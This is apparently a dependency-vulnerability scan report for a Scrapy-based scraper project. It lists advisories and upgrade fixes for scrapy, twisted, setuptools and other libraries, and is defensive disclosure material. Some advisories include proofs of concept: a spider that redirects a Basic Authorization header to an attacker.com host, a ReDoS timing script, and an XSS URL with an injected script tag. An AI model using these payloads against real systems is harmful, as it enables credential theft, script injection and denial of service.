ZoranPandovski/ProdirectScraper:requirements.txt

Vulnerabilities

20 via 35 paths

Dependencies

43

Source

GitHub

Commit

1ab18b20

Find, fix and prevent vulnerabilities in your code.

Issue type
  • 20
  • 1
Severity
  • 6
  • 15
Status
  • 21
  • 0
  • 0

high severity

Improper Resource Shutdown or Release

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@1.8.4.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Improper Resource Shutdown or Release due to the enforcement of response size limits only during the download of raw, usually-compressed response bodies and not during decompression. A malicious website being scraped could send a small response that, upon decompression, could exhaust the memory available to the process, potentially affecting any other process sharing that memory, and affecting disk usage in case of uncompressed response caching.

Remediation

Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.

References

high severity

Information Exposure Through Sent Data

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.11.1.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Information Exposure Through Sent Data due to the failure to remove the Authorization header when redirecting across domains. An attacker can potentially allow for account hijacking by exploiting the exposure of the Authorization header to unauthorized actors.

PoC


class QuotesSpider(scrapy.Spider):
    name = "quotes"
    

    def start_requests(self):
        urls = [
                'http://mysite.com/redirect.php?url=http://attacker.com:8182/xx',
        ]
        for url in urls:
            yield scrapy.Request(url=url,cookies={'currency': 'USD', 'country': 'UY'},headers={'Authorization':'Basic YWxhZGRpbjpvcGVuc2VzYW1l'},callback=self.parse)

    def parse(self, response):
        page = response.url.split("/")[-2]
        filename = f'quotes-{page}.html'
        with open(filename, 'wb') as f:
            f.write(response.body)
        self.log(f'Saved file {filename}')

Remediation

Upgrade Scrapy to version 2.11.1 or higher.

References

high severity

Origin Validation Error

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@1.8.4.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Origin Validation Error due to the improper handling of the Authorization header during cross-domain redirects. An attacker can leak sensitive information by inducing the server to redirect a request with the Authorization header to a different domain.

Workarounds

1)Make sure that the Authentication header, either directly or through some third-party plugin is not used.

2)If that header is needed in some requests, add dont_redirect: True to the request.meta dictionary of those requests to disable following redirects for them.

3)If same domain redirect support is needed on those requests, make sure you trust the target website not to redirect your requests to a different domain.

Remediation

Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@1.8.4.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the XMLFeedSpider class or any subclass that uses the default node iterator iternodes, as well as direct uses of the scrapy.utils.iterators.xmliter function. An attacker can cause extreme CPU and memory usage during the parsing of its content by handling a malicious response.

Note:

For versions 2.6.0 to 2.11.0, the vulnerable function is open_in_browser for a response without a base tag.

Workaround

  1. For XMLFeedSpider, switch the node iterator to xml or html.
  2. For open_in_browser, before using the function, either manually review the response content to discard a ReDoS attack or manually define the base tag to avoid its automatic definition by open_in_browser later.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.11.1.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when parsing content. An attacker can cause extreme CPU and memory usage by handling a malicious response.

PoC

import re
import time
import math

def convert_size(size_bytes):
   if size_bytes == 0:
       return "0B"
   size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
   i = int(math.floor(math.log(size_bytes, 1024)))
   p = math.pow(1024, i)
   s = round(size_bytes / p, 2)
   return "%s %s" % (s, size_name[i])

END_TAG_RE = re.compile(r"<\s*/([^\s>]+)\s*>", re.S)

len_lists = [10000, 20000, 50000, 100000, 500000, 1000000]

for n in len_lists:
    st = time.time()
    header_end = '</'*n
    re.findall(END_TAG_RE, header_end)
    et = time.time()
    elapsed_time = et - st
    print(f'Execution time with len = {n} ~ {convert_size(len(header_end))}:

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade Scrapy to version 2.11.1 or higher.

References

high severity

Improper Control of Generation of Code ('Code Injection')

  • Vulnerable module: setuptools
  • Introduced through: mock@2.0.0, twisted@23.8.0 and others

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a mock@2.0.0 pbr@6.1.1 setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0 zope-interface@? setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 zope.interface@6.4.post2 setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0 zope-interface@? setuptools@40.5.0

…and 1 more

Overview

Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') through the package_index module's download functions due to the unsafe usage of os.system. An attacker can execute arbitrary commands on the system by providing malicious URLs or manipulating the URLs retrieved from package index servers.

Note

Because easy_install and package_index are deprecated, the exploitation surface is reduced, but it's conceivable through social engineering or minor compromise to a package index could grant remote access.

Remediation

Upgrade setuptools to version 70.0.0 or higher.

References

medium severity

HTTP Response Smuggling

  • Vulnerable module: twisted
  • Introduced through: twisted@23.8.0 and scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0
    Remediation: Upgrade to twisted@24.7.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0
    Remediation: Upgrade to scrapy@1.8.2.

Overview

Twisted is an event-based network programming and multi-protocol integration framework.

Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request. Information disclosure across sessions may also be possible for reverse proxy servers using pooled connections.

Workaround

This vulnerability can be avoided by enforcing HTTP/2, as it is only vulnerable for HTTP/1.x traffic.

Remediation

Upgrade Twisted to version 24.7.0rc1 or higher.

References

medium severity

Infinite loop

  • Vulnerable module: zipp
  • Introduced through: twisted@23.8.0 and scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0 attrs@24.2.0 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to twisted@23.8.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 service-identity@21.1.0 attrs@24.2.0 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to scrapy@1.8.4.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0 attrs@24.2.0 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to scrapy@1.8.2.

Overview

Affected versions of this package are vulnerable to Infinite loop where an attacker can cause the application to stop responding by initiating a loop through functions affecting the Path module, such as joinpath, the overloaded division operator, and iterdir.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade zipp to version 3.19.1 or higher.

References

medium severity

Files or Directories Accessible to External Parties

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.11.2.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Files or Directories Accessible to External Parties via the DOWNLOAD_HANDLERS setting. An attacker can redirect traffic to unintended protocols such as file:// or s3://, potentially accessing sensitive data or credentials by manipulating the start URLs of a spider and observing the output.

Notes:

  1. HTTP redirects should only work between URLs that use the http:// or https:// schemes.

  2. A malicious actor, given write access to the start requests of a spider and read access to the spider output, could exploit this vulnerability to:

a) Redirect to any local file using the file:// scheme to read its contents.

b) Redirect to an ftp:// URL of a malicious FTP server to obtain the FTP username and password configured in the spider or project.

c) Redirect to any s3:// URL to read its content using the S3 credentials configured in the spider or project.

  1. A spider that always outputs the entire contents of a response would be completely vulnerable.

  2. A spider that extracted only fragments from the response could significantly limit vulnerable data.

Remediation

Upgrade Scrapy to version 2.11.2 or higher.

References

medium severity

Improper Removal of Sensitive Information Before Storage or Transfer

  • Vulnerable module: urllib3
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests@2.31.0 urllib3@2.0.7
    Remediation: Upgrade to scrapy@2.0.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests-file@2.1.0 requests@2.31.0 urllib3@2.0.7
    Remediation: Upgrade to scrapy@2.0.0.

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Improper Removal of Sensitive Information Before Storage or Transfer due to the improper handling of the Proxy-Authorization header during cross-origin redirects when ProxyManager is not in use. When the conditions below are met, including non-recommended configurations, the contents of this header can be sent in an automatic HTTP redirect.

Notes:

To be vulnerable, the application must be doing all of the following:

  1. Setting the Proxy-Authorization header without using urllib3's built-in proxy support.

  2. Not disabling HTTP redirects (e.g. with redirects=False)

  3. Either not using an HTTPS origin server, or having a proxy or target origin that redirects to a malicious origin.

Workarounds

  1. Using the Proxy-Authorization header with urllib3's ProxyManager.

  2. Disabling HTTP redirects using redirects=False when sending requests.

  3. Not using the Proxy-Authorization header.

Remediation

Upgrade urllib3 to version 1.26.19, 2.2.2 or higher.

References

medium severity

Exposure of Sensitive Information to an Unauthorized Actor

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.11.2.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Exposure of Sensitive Information to an Unauthorized Actor due to improper handling of HTTP headers during cross-origin redirects. An attacker can intercept the Authorization header and potentially access sensitive information by exploiting this misconfiguration in redirect scenarios where the domain remains the same but the scheme or port changes.

Note: In the context of a man-in-the-middle attack, this could be used to get access to the value of that Authorization header.

Remediation

Upgrade Scrapy to version 2.11.2 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.6.0.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Information Exposure in which a spider could leak cookie headers when being forwarded to a third party, potentially attacker-controlled website.

Remediation

Upgrade Scrapy to version 2.6.0 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: setuptools
  • Introduced through: mock@2.0.0, twisted@23.8.0 and others

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a mock@2.0.0 pbr@6.1.1 setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0 zope-interface@? setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 zope.interface@6.4.post2 setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0 zope-interface@? setuptools@40.5.0

…and 1 more

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via crafted HTML package or custom PackageIndex page.

Note:

Only a small portion of the user base is impacted by this flaw. Setuptools maintainers pointed out that package_index is deprecated (not formally, but “in spirit”) and the vulnerability isn't reachable through standard, recommended workflows.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade setuptools to version 65.5.1 or higher.

References

medium severity

Always-Incorrect Control Flow Implementation

  • Vulnerable module: requests
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests@2.31.0
    Remediation: Upgrade to scrapy@2.0.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests-file@2.1.0 requests@2.31.0
    Remediation: Upgrade to scrapy@2.0.0.

Overview

Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session. An attacker can bypass certificate verification by making the first request with verify=False, causing all subsequent requests to ignore certificate verification regardless of changes to the verify value.

Notes:

  1. For requests <2.32.0, avoid setting verify=False for the first request to a host while using a Requests Session.

  2. For requests <2.32.0, call close() on Session objects to clear existing connections if verify=False is used.

  3. This vulnerability was initially fixed in version 2.32.0, which was yanked. Therefore, the next available fixed version is 2.32.2.

Remediation

Upgrade requests to version 2.32.2 or higher.

References

medium severity

NULL Pointer Dereference

  • Vulnerable module: lxml
  • Introduced through: lxml@4.6.5 and scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a lxml@4.6.5
    Remediation: Upgrade to lxml@4.9.1.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 lxml@4.6.5
    Remediation: Upgrade to scrapy@1.8.4.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 parsel@1.8.1 lxml@4.6.5

Overview

Affected versions of this package are vulnerable to NULL Pointer Dereference in the iterwalk() function (used by canonicalize) that can be triggered by malicious input.

NOTE: This only applies when lxml is used together with libxml2 2.9.10 through 2.9.14.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade lxml to version 4.9.1 or higher.

References

medium severity

Credential Exposure

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@1.8.3.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Credential Exposure via the process_request() function in downloadermiddlewares/httpproxy.py. A proxy can leak credentials to another proxy if third-party downloader middlewares leave Proxy-Authentication headers unchanged when updating proxy metadata for a new request.

NOTE: To fully mitigate the effects of vulnerability, replacing or upgrading the third-party downloader middleware might be necessary after upgrading.

Remediation

Upgrade Scrapy to version 1.8.3, 2.6.2 or higher.

References

medium severity

HTTP Response Smuggling

  • Vulnerable module: twisted
  • Introduced through: twisted@23.8.0 and scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0
    Remediation: Upgrade to twisted@23.10.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0
    Remediation: Upgrade to scrapy@1.8.2.

Overview

Twisted is an event-based network programming and multi-protocol integration framework.

Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request.

Workaround

This vulnerability can be avoided by enforcing HTTP/2, as it is only vulnerable for HTTP/1.x traffic.

Remediation

Upgrade Twisted to version 23.10.0rc1 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2

Overview

via S3FilesStore. Files are stored in memory before uploaded to s3, increasing memory usage if giant or many files are being uploaded at the same time.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: twisted
  • Introduced through: twisted@23.8.0 and scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0
    Remediation: Upgrade to twisted@24.7.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0
    Remediation: Upgrade to scrapy@1.8.2.

Overview

Twisted is an event-based network programming and multi-protocol integration framework.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) when the victim is using Firefox, due to an unescaped URL in the redirectTo() function. A site which is vulnerable to open redirects by other means can be can be made to execute scripts injected into a redirect URL.

PoC

http://127.0.0.1:9009?url=ws://example.com/"><script>alert(document.location)</script>

Details

A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

